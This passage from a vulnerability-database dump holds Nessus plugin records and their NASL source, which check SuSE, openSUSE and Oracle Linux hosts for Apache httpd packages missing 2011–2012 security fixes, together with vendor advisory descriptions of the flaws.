security issues in the Apache webserver.\n\nThe patch for the ByteRange remote denial of service attack\n(CVE-2011-3192) was refined and the configuration options used by\nupstream were added. Introduce new config option: Allow MaxRanges\nNumber of ranges requested, if exceeded, the complete content is\nserved. default: 200 0|unlimited: unlimited none: Range headers are\nignored. This option is a backport from 2.2.21.\n\nAlso fixed: CVE-2011-3348: Denial of service in proxy_ajp when using a\nundefined method.\n\nCVE-2011-3368: Exposure of internal servers via reverse proxy methods\nwith mod_proxy enabled and incorrect Rewrite or Proxy Rules.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=713966\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=719236\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722545\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-11/msg00004.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-certificates\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-2.2.15-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", 
reference:\"apache2-devel-2.2.15-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-example-certificates-2.2.15-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-example-pages-2.2.15-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-itk-2.2.15-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-prefork-2.2.15-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-utils-2.2.15-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-worker-2.2.15-4.7.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T12:59:24", "description": "This update fixes several security issues in the Apache2 webserver.\n\n - This update also includes several fixes for a mod_proxy reverse exposure via RewriteRule or ProxyPassMatch directives. (CVE-2011-3639 / CVE-2011-3368 / CVE-2011-4317)\n\n - Fixed the SSL renegotiation DoS by disabling renegotiation by default. (CVE-2011-1473)\n\n - Integer overflow in ap_pregsub function resulting in a heap-based buffer overflow could potentially allow local attackers to gain privileges. 
(CVE-2011-3607)\n\nAlso a non-security bug was fixed :\n\n - httpd-2.2.x-bnc727071-mod_authnz_ldap-utf8.diff: make non-ascii eg UTF8 passwords work with mod_authnz_ldap.\n [bnc#727071]", "cvss3": {"score": null, "vector": null}, "published": "2011-12-13T00:00:00", "type": "nessus", "title": "SuSE 11.1 Security Update : Apache2 (SAT Patch Number 5482)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1473", "CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2011-4317"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:apache2", "p-cpe:/a:novell:suse_linux:11:apache2-doc", "p-cpe:/a:novell:suse_linux:11:apache2-example-pages", "p-cpe:/a:novell:suse_linux:11:apache2-prefork", "p-cpe:/a:novell:suse_linux:11:apache2-utils", "p-cpe:/a:novell:suse_linux:11:apache2-worker", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_APACHE2-111130.NASL", "href": "https://www.tenable.com/plugins/nessus/57090", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57090);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-1473\", \"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\");\n\n script_name(english:\"SuSE 11.1 Security Update : Apache2 (SAT Patch Number 5482)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in the Apache2 webserver.\n\n - This update also includes several fixes for a mod_proxy\n reverse exposure via RewriteRule or ProxyPassMatch\n directives. (CVE-2011-3639 / CVE-2011-3368 /\n CVE-2011-4317)\n\n - Fixed the SSL renegotiation DoS by disabling\n renegotiation by default. (CVE-2011-1473)\n\n - Integer overflow in ap_pregsub function resulting in a\n heap-based buffer overflow could potentially allow local\n attackers to gain privileges. 
(CVE-2011-3607)\n\nAlso a non-security bug was fixed :\n\n - httpd-2.2.x-bnc727071-mod_authnz_ldap-utf8.diff: make\n non-ascii eg UTF8 passwords work with mod_authnz_ldap.\n [bnc#727071]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=688472\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722545\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=727071\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=728533\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=728876\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=729181\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1473.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3368.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3607.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3639.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-4317.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 5482.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", 
value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif 
(isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-2.2.12-1.28.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-doc-2.2.12-1.28.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-example-pages-2.2.12-1.28.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-prefork-2.2.12-1.28.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-utils-2.2.12-1.28.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-worker-2.2.12-1.28.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-09-01T02:35:29", "description": "- ignore case when checking against SNI server names.\n [bnc#798733] httpd-2.2.x-bnc798733-SNI_ignorecase.diff\n\n - better cleanup of busy count after recovering from failure [bnc#789828] httpd-2.2.x-bnc789828-mod_balancer.diff\n\n- httpd-2.2.x-bnc788121-CVE-2012-4557-mod_proxy_ajp_timeout.diff:\nbackend timeouts should not affect the entire worker. [bnc#788121]\n\n- httpd-2.2.x-envvars.diff obsoletes httpd-2.0.54-envvars.dif:\nFix for low profile bug CVE-2012-0883 about improper LD_LIBRARY_PATH handling. [bnc#757710]\n\n- httpd-2.2.x-bnc777260-CVE-2012-2687-mod_negotiation_filename_xss.diff Escape filename for the case that uploads are allowed with untrusted user's control over filenames and mod_negotiation enabled on the same directory. CVE-2012-2687 [bnc#777260]\n\n- httpd-2.2.x-CVE-2011-3368_CVE-2011-4317-bnc722545.diff reworked to reflect the upstream changes. This will prevent the 'Invalid URI in request OPTIONS *' messages in the error log. 
[bnc#722545]", "cvss3": {"score": null, "vector": null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : apache2 (openSUSE-SU-2013:0243-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-4317", "CVE-2012-0883", "CVE-2012-2687", "CVE-2012-4557"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2", "p-cpe:/a:novell:opensuse:apache2-debuginfo", "p-cpe:/a:novell:opensuse:apache2-debugsource", "p-cpe:/a:novell:opensuse:apache2-devel", "p-cpe:/a:novell:opensuse:apache2-event", "p-cpe:/a:novell:opensuse:apache2-event-debuginfo", "p-cpe:/a:novell:opensuse:apache2-example-pages", "p-cpe:/a:novell:opensuse:apache2-itk", "p-cpe:/a:novell:opensuse:apache2-itk-debuginfo", "p-cpe:/a:novell:opensuse:apache2-prefork", "p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo", "p-cpe:/a:novell:opensuse:apache2-utils", "p-cpe:/a:novell:opensuse:apache2-utils-debuginfo", "p-cpe:/a:novell:opensuse:apache2-worker", "p-cpe:/a:novell:opensuse:apache2-worker-debuginfo", "cpe:/o:novell:opensuse:12.1"], "id": "OPENSUSE-2013-80.NASL", "href": "https://www.tenable.com/plugins/nessus/75181", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-80.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75181);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-4317\", \"CVE-2012-0883\", \"CVE-2012-2687\", \"CVE-2012-4557\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-SU-2013:0243-1)\");\n script_summary(english:\"Check for the openSUSE-2013-80 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n 
value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - ignore case when checking against SNI server names.\n [bnc#798733] httpd-2.2.x-bnc798733-SNI_ignorecase.diff\n\n - better cleanup of busy count after recovering from\n failure [bnc#789828]\n httpd-2.2.x-bnc789828-mod_balancer.diff\n\n- httpd-2.2.x-bnc788121-CVE-2012-4557-mod_proxy_ajp_timeout.diff:\nbackend timeouts should not affect the entire worker. [bnc#788121]\n\n- httpd-2.2.x-envvars.diff obsoletes httpd-2.0.54-envvars.dif:\nFix for low profile bug CVE-2012-0883 about improper LD_LIBRARY_PATH\nhandling. [bnc#757710]\n\n- httpd-2.2.x-bnc777260-CVE-2012-2687-mod_negotiation_filename_xss.diff\nEscape filename for the case that uploads are allowed with untrusted\nuser's control over filenames and mod_negotiation enabled on the\nsame directory. CVE-2012-2687 [bnc#777260]\n\n- httpd-2.2.x-CVE-2011-3368_CVE-2011-4317-bnc722545.diff reworked to\nreflect the upstream changes. This will prevent the 'Invalid URI in\nrequest OPTIONS *' messages in the error log. 
[bnc#722545]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722545\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=777260\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=788121\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=789828\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=798733\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-02/msg00009.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-debuginfo-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-debugsource-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-devel-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-event-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-event-debuginfo-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-example-pages-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-itk-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-itk-debuginfo-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-prefork-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-prefork-debuginfo-2.2.21-3.9.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE12.1\", reference:\"apache2-utils-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-utils-debuginfo-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-worker-2.2.21-3.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-worker-debuginfo-2.2.21-3.9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2 / apache2-debuginfo / apache2-debugsource / apache2-devel / etc\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T18:28:23", "description": "From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1392) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. 
Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : httpd (ELSA-2012-0323)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:httpd", "p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd-manual", "p-cpe:/a:oracle:linux:mod_ssl", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2012-0323.NASL", "href": "https://www.tenable.com/plugins/nessus/68488", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0323 and \n# Oracle Linux Security Advisory ELSA-2012-0323 
respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68488);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50322, 50494, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0323\");\n\n script_name(english:\"Oracle Linux 5 : httpd (ELSA-2012-0323)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. 
Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", 
